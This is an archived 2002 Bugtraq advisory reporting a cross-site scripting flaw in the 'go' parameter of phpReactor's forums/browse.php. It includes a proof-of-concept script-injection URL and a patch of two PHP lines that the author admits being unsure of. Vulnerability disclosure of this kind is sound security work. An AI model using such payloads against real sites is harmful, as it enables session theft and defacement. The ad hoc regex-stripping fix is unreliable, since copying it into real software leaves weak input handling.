[27377] in bugtraq


home	help	back	first	fref	pref	prev	next	nref	lref	last	post

XSS bug in php(Reactor)

daemon@ATHENA.MIT.EDU (Arab VieruZ)
Thu Oct 10 13:53:27 2002

Date: 10 Oct 2002 12:43:11 -0000
Message-ID: <20021010124311.16937.qmail@mail.securityfocus.com>
Content-Type: text/plain
Content-Disposition: inline
Content-Transfer-Encoding: binary
MIME-Version: 1.0
From: Arab VieruZ <arabviersus@hotmail.com>
To: bugtraq@securityfocus.com



Vulnerable systems:
1.2.7pl1

Exploit:
forums/browse.php?fid=3&tid=46&go=<scri*pt>JavaScript:alert
('Hi');</scri*pt>

(with out "*")

Solution:
i thought this but i am not sure

open browse.php and add this code in line 52:

$go = HTMLSpecialChars($go);
$go = PREG_Replace("/[A-Z&.;:()~!@#$%^''*\{\}\/]/i", "", $go);

----------------------------------
Arab Vieruz

thanx


home	help	back	first	fref	pref	prev	next	nref	lref	last	post

[27377] in bugtraq

XSS bug in php(Reactor)

daemon@ATHENA.MIT.EDU (Arab VieruZ)Thu Oct 10 13:53:27 2002

daemon@ATHENA.MIT.EDU (Arab VieruZ)
Thu Oct 10 13:53:27 2002